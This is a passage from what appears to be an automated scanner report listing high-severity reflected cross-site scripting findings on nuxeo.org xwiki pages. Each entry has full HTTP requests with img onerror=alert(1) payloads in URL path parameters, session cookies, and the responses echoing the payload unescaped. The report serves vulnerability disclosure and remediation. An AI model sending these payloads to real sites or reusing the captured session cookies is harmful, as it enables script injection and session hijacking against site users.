This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main76490<img%20src%3da%20onerror%3dalert(1)>4484ac9bb2/WebRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:34 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12845
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main76490%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4484ac9bb2/">Main76490<img src=a onerror=alert(1)>4484ac9bb2</a>
...[SNIP]...

4.535. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89aa6"><img%20src%3da%20onerror%3dalert(1)>625cf66d6b7 was submitted in the REST URL parameter 5. This input was echoed as 89aa6"><img src=a onerror=alert(1)>625cf66d6b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebRss89aa6"><img%20src%3da%20onerror%3dalert(1)>625cf66d6b7 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12908
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebRss89aa6%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E625cf66d6b7?format=xar&amp;name=Main.WebRss89aa6"><img src=a onerror=alert(1)>625cf66d6b7&amp;pages=Main.WebRss89aa6">
...[SNIP]...

4.536. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cbc6a<img%20src%3da%20onerror%3dalert(1)>c41e6b9b885 was submitted in the REST URL parameter 5. This input was echoed as cbc6a<img src=a onerror=alert(1)>c41e6b9b885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebRsscbc6a<img%20src%3da%20onerror%3dalert(1)>c41e6b9b885 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12846
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebRsscbc6a%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec41e6b9b885'>WebRsscbc6a<img src=a onerror=alert(1)>c41e6b9b885</a>
...[SNIP]...

4.537. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5df85<img%20src%3da%20onerror%3dalert(1)>8a2f5dddb89 was submitted in the REST URL parameter 4. This input was echoed as 5df85<img src=a onerror=alert(1)>8a2f5dddb89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main5df85<img%20src%3da%20onerror%3dalert(1)>8a2f5dddb89/WebSearch HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:04 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12897
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main5df85%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8a2f5dddb89/">Main5df85<img src=a onerror=alert(1)>8a2f5dddb89</a>
...[SNIP]...

4.538. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce21f"><img%20src%3da%20onerror%3dalert(1)>527223fb6d6 was submitted in the REST URL parameter 4. This input was echoed as ce21f"><img src=a onerror=alert(1)>527223fb6d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maince21f"><img%20src%3da%20onerror%3dalert(1)>527223fb6d6/WebSearch HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12963
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maince21f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E527223fb6d6/WebSearch?format=xar&amp;name=Maince21f"><img src=a onerror=alert(1)>527223fb6d6.WebSearch&amp;pages=Maince21f">
...[SNIP]...

4.539. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f4e0<img%20src%3da%20onerror%3dalert(1)>60a04462bbb was submitted in the REST URL parameter 5. This input was echoed as 5f4e0<img src=a onerror=alert(1)>60a04462bbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebSearch5f4e0<img%20src%3da%20onerror%3dalert(1)>60a04462bbb HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12885
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch5f4e0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E60a04462bbb'>WebSearch5f4e0<img src=a onerror=alert(1)>60a04462bbb</a>
...[SNIP]...

4.540. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9111c"><img%20src%3da%20onerror%3dalert(1)>864bc9e0d28 was submitted in the REST URL parameter 5. This input was echoed as 9111c"><img src=a onerror=alert(1)>864bc9e0d28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebSearch9111c"><img%20src%3da%20onerror%3dalert(1)>864bc9e0d28 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12947
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebSearch9111c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E864bc9e0d28?format=xar&amp;name=Main.WebSearch9111c"><img src=a onerror=alert(1)>864bc9e0d28&amp;pages=Main.WebSearch9111c">
...[SNIP]...

4.541. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6e09<img%20src%3da%20onerror%3dalert(1)>c2ab2f9a43c was submitted in the REST URL parameter 4. This input was echoed as f6e09<img src=a onerror=alert(1)>c2ab2f9a43c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainf6e09<img%20src%3da%20onerror%3dalert(1)>c2ab2f9a43c/WindowsService HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12962
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainf6e09%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec2ab2f9a43c/">Mainf6e09<img src=a onerror=alert(1)>c2ab2f9a43c</a>
...[SNIP]...

4.542. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 924d9"><img%20src%3da%20onerror%3dalert(1)>50183281015 was submitted in the REST URL parameter 4. This input was echoed as 924d9"><img src=a onerror=alert(1)>50183281015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main924d9"><img%20src%3da%20onerror%3dalert(1)>50183281015/WindowsService HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13028
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main924d9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E50183281015/WindowsService?format=xar&amp;name=Main924d9"><img src=a onerror=alert(1)>50183281015.WindowsService&amp;pages=Main924d9">
...[SNIP]...

4.543. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 789b1"><img%20src%3da%20onerror%3dalert(1)>6568bdce5f7 was submitted in the REST URL parameter 5. This input was echoed as 789b1"><img src=a onerror=alert(1)>6568bdce5f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WindowsService789b1"><img%20src%3da%20onerror%3dalert(1)>6568bdce5f7 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13012
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WindowsService789b1%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6568bdce5f7?format=xar&amp;name=Main.WindowsService789b1"><img src=a onerror=alert(1)>6568bdce5f7&amp;pages=Main.WindowsService789b1">
...[SNIP]...

4.544. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 673bb<img%20src%3da%20onerror%3dalert(1)>0945b5817dd was submitted in the REST URL parameter 5. This input was echoed as 673bb<img src=a onerror=alert(1)>0945b5817dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WindowsService673bb<img%20src%3da%20onerror%3dalert(1)>0945b5817dd HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService673bb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E0945b5817dd'>WindowsService673bb<img src=a onerror=alert(1)>0945b5817dd</a>
...[SNIP]...

4.545. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126ea"><img%20src%3da%20onerror%3dalert(1)>218d536e8de was submitted in the REST URL parameter 4. This input was echoed as 126ea"><img src=a onerror=alert(1)>218d536e8de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki126ea"><img%20src%3da%20onerror%3dalert(1)>218d536e8de/Admin HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki126ea%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E218d536e8de/Admin?format=xar&amp;name=XWiki126ea"><img src=a onerror=alert(1)>218d536e8de.Admin&amp;pages=XWiki126ea">
...[SNIP]...

4.546. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1323f<img%20src%3da%20onerror%3dalert(1)>ed793d6b7ca was submitted in the REST URL parameter 4. This input was echoed as 1323f<img src=a onerror=alert(1)>ed793d6b7ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki1323f<img%20src%3da%20onerror%3dalert(1)>ed793d6b7ca/Admin HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:21 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12858
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWiki1323f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eed793d6b7ca/">XWiki1323f<img src=a onerror=alert(1)>ed793d6b7ca</a>
...[SNIP]...

4.547. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
